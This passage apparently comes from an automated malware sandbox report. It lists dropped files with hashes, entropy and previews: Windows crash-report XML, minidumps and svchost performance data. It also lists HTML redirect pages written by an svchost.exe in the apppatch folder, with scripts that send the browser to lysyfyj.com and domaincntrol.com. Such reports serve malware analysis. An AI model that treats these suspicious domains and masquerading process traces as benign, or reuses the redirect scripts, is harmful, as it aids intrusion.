                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8380
                                                                                                                                                                                                              Entropy (8bit):3.7098203340845592
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJyw6RcC6Y9hSU9BFgmfOeprt89bl+sfTOQXm:R6lXJt6v6YrSU9BFgmfOhl9fat
                                                                                                                                                                                                              MD5:81FFDF97F32E548373EF65A5FA1531C2
                                                                                                                                                                                                              SHA1:E4D5965532814D04F1349871CCDDDED53F7B0969
                                                                                                                                                                                                              SHA-256:CF2F4824A731CDBD6CAAB413A71082157D5121800F117EE2FD679EE28EC46DF7
                                                                                                                                                                                                              SHA-512:6B1AD531C0D8CF4078B84FCA7F5CC2C61BCECB4AE64AD2B3C6A3334868AE09FAA378D45D7528E73843638A7814DD543E0E36008C00AF77A9402E797E4D8F1950
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4649
                                                                                                                                                                                                              Entropy (8bit):4.520792077034609
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zs/Jg77aI9cyyWpW8VYemYm8M4J0qFh+q8cK01JLYd:uIjfhI7iu7VBJ3pPLYd
                                                                                                                                                                                                              MD5:6F19B37EDA0B49EF7953909C586ECD25
                                                                                                                                                                                                              SHA1:7FE10527C0BD71683521E1C779EEB963C48241A4
                                                                                                                                                                                                              SHA-256:89DA961D23550F76471EC83F24350C34016F9CF401A4B11F84132E09A0157C25
                                                                                                                                                                                                              SHA-512:B62DC45EA9D118CB23B87B64A96EFC598E213DB319EB4FEE2BC61E7C31515D5128B3112DFA15260E4F33B40259196758613795DA37DAC7952F1ED6A56C5FAE05
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):80640
                                                                                                                                                                                                              Entropy (8bit):3.0583512831625304
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:HrBSD3TkEyKxAumqYVIR+gwLOjYZBQjRQIsjOzmL8saFy:HrBSrTkEyOVg8+gmMYP4/sjd5t
                                                                                                                                                                                                              MD5:51B9C99992E2EBECB60B553FEAC49727
                                                                                                                                                                                                              SHA1:83A5E065F01613557C5F8AABD1CBEBBC201AA7AB
                                                                                                                                                                                                              SHA-256:C7E071E9D51CC2477599643518038C3191A5A74E05C70C444960EF6D61504D43
                                                                                                                                                                                                              SHA-512:AB07C921972AAE04331EF52DE0A29010A240BB9046E96B14C9A2042FF4706CEFCCCB60A8FFBE5C7A88037386B4433CFF41DE456D71D97D88DD2D37C25935C097
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                              Entropy (8bit):2.685548034667581
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:TiZYWAKsz6bYdEY7W0HSPYEZtztHiLItI1Pw+inN7aZ3a+JM+J/IzA3:2ZD9h/+TiN7aZ3aOM+JQzA3
                                                                                                                                                                                                              MD5:8D4A0C68FB0386797A89274B9EB6C576
                                                                                                                                                                                                              SHA1:D9894C057FB8704321EFC302099DB7A2929339D0
                                                                                                                                                                                                              SHA-256:8835DE5D48D6139FD4D401CED1CD9EA394EE6CC1D8ED46DFF9B575F625B1F749
                                                                                                                                                                                                              SHA-512:52140B92A55E67E9F7D8FF1D1F03E7B77231C97D6E4B77B69E1F199C4861966A99A033962A3A8F4C89C8AD6BDECD7529DD3CEC6A8890F339BC800ABAAFAC3C87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Fri Aug 23 16:47:35 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106294
                                                                                                                                                                                                              Entropy (8bit):1.8536990565115703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:MXQPzMcTsSnHbobPqhRdkECgDyKpVNWrTlm4OXk:D7DTssuShRKECYp/W9k0
                                                                                                                                                                                                              MD5:DB6B26DCD54C79059B290F4003A7EA27
                                                                                                                                                                                                              SHA1:409AC4E4BBDFC6418FE5259E881E4BC78630D243
                                                                                                                                                                                                              SHA-256:4B5E81B569B8A7F163C94E8FC931E13A52DB735465FF6428FD6C0F8475349383
                                                                                                                                                                                                              SHA-512:239DBB1B7712A5D96B1582D0781B6F7CD5434FD05204F3FEFBFDA5CCBB70702761B63F0FC5450B4719232A2CCD4EE8D103B985575006C176E71EFB45378C550D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... .......'..f........................l...........t....B..........T.......8...........T............!...}..........X...........D...............................................................................eJ..............GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8380
                                                                                                                                                                                                              Entropy (8bit):3.7111713651399394
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJg56m6Y9vSU9BFgmfOepr189bOzsfe6m:R6lXJm6m6YFSU9BFgmfOpOYfa
                                                                                                                                                                                                              MD5:55EE2083EA1DE6C15B7B3FD416814D11
                                                                                                                                                                                                              SHA1:23439E1A2741298A36011E20B1C5BA42C8FBB296
                                                                                                                                                                                                              SHA-256:4A3B8379ED16417C8E2C5F08DA553121B3D767C637967387CECBB088F9B98463
                                                                                                                                                                                                              SHA-512:AF3E7282036DB66F7271F4211D488C242A32B5A9C2B7A54E458A85C6D699425B3943984EAFFCB3AACDF72D037CF8536C3449722DB5A29B788693FF544E67E02D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.0.<./.P.i.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4649
                                                                                                                                                                                                              Entropy (8bit):4.521087491909925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zs/Jg77aI9cyyWpW8VYepYm8M4J0qFi+q8c901JLjd:uIjfhI7iu7V6JsEPLjd
                                                                                                                                                                                                              MD5:C2F94DB1373AEB25744268ADD852B91D
                                                                                                                                                                                                              SHA1:4E1B0D9C20B8F09C20D6902D985C0CC304FF0B45
                                                                                                                                                                                                              SHA-256:E17E4A0456CA103399AC0FB1A4DF3E3DE7F6939E03DD100A14A4EA3CC738A4A0
                                                                                                                                                                                                              SHA-512:912A51D1465B9692DD10DF8399D61D8460975757120F132A19F0787C419718F594CD25B640162B93060AA0AF5D05EFB69A228F3B0F076B78C4A4DF93DFD67A71
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):81426
                                                                                                                                                                                                              Entropy (8bit):3.057969705833061
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:nu2FV0/Jjq3AuVqYQIRwrSjOjqZr/jaPeIs/wmLEol:nu2P0/JjqjQV8wrYMqleP9s/jwol
                                                                                                                                                                                                              MD5:E0AAE8FBDEB4F647EF93D4CAB04AFF31
                                                                                                                                                                                                              SHA1:06F0E51590831108A2A357AD7937D984B603A159
                                                                                                                                                                                                              SHA-256:BE0820B6942AA3964F335BF988510F9016E0A5C8D1107CD88B3428BCE678E8D0
                                                                                                                                                                                                              SHA-512:FA86B6DD3D093557054798D563AE3F33711D3E3A29622DF47475806DB3C9A6A3F328591637E79453EA7E1AC536C781DB7D1628D97B959A4307475404B06D3B0B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                              Entropy (8bit):2.685699206796057
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:TiZYWqK9NGlUYKYpWlHSZYEZBUtHioIcIAGwyRza3z3aWMeJQIH+A3:2ZDKUtSJ1aj3aWMeJnH+A3
                                                                                                                                                                                                              MD5:EA0CD9791466905CC7E90F81135FF7C6
                                                                                                                                                                                                              SHA1:DFEB78FE7A8FF12DF9423F069DDC7C9B211DA440
                                                                                                                                                                                                              SHA-256:2825E3E27B811D96CF1F1F0DCE9D55C31E07E5A92BA2706C93178AD8C8E66697
                                                                                                                                                                                                              SHA-512:FA4BA8C2FAA5F0D8DFC87F922AAF2FC80EC6A81EC29DED3B96A40CC057C9D5A4170F05068B685CCB3CA341AC16B276A8857ADB0099744897FFBCA16347FAAEE5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (481), with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):481
                                                                                                                                                                                                              Entropy (8bit):5.739006515831124
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:kxvsCk9cE3MxlVT/XvWGqJbJXHU3mmp1ACYI:kbxxlVT/OVJXDmpKZI
                                                                                                                                                                                                              MD5:04C7AF081E0A2E11F209EDA6ECF173C0
                                                                                                                                                                                                              SHA1:B5C145EADB12234EC620A2CD84842D612496F569
                                                                                                                                                                                                              SHA-256:6FAA78E452188C9BC897B1CDC8D47649A5F6FAFFA01EBA8B117FA39C011327F1
                                                                                                                                                                                                              SHA-512:19788746A4608EFD77DCB1C6E2B8F0398DFDCA93379146196829E3015043A3BE20EC20AAF2996730A57B921B87DBC6395C789DDAA9BB2B22A92F9E164149010C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODgyMiwiaWF0IjoxNzI0NDMxNjIyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aXI0NDFoMHRhMnY2YWcwYmFmNDYiLCJuYmYiOjE3MjQ0MzE2MjIsInRzIjoxNzI0NDMxNjIyMTIyMjA4fQ.BHCRiez0Con86KddMGsehpcTbWt4MqaQk6ziSlKmf8I&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):4.470551863591405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                              MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                              SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                              SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                              SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (481), with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):481
                                                                                                                                                                                                              Entropy (8bit):5.81002766472882
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:kxvsCk9cE3MxlVT/XK+rJbi42DC3lmOE1bACYI:kbxxlVT/fmOE1kZI
                                                                                                                                                                                                              MD5:108AB2AF67DF50E7931DD7A6AF9917CE
                                                                                                                                                                                                              SHA1:7B78836D0E00FF2C6B84159F7A228762706C3E4F
                                                                                                                                                                                                              SHA-256:9565E5E9CB146F8A47032A0EF83850D1BA657D4137C0BA43EB35702A8567764B
                                                                                                                                                                                                              SHA-512:96DA8DE6B6053EC6A96376AD6E7781D7F63EFF397EA462006B47A533FFF27F51C996C3489D6BD6CD22272D5DC2DA2130074796FE8D16F334A51A94C1F98D0C3E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODkzOSwiaWF0IjoxNzI0NDMxNzM5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42ajF2MWk4bGRuZGF0MWcwYmNxNDciLCJuYmYiOjE3MjQ0MzE3MzksInRzIjoxNzI0NDMxNzM5NjU1MzU3fQ.93jHNDe653NfZkCJsNnTuXM0ey0AS4uxh9LM4mPx99U&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
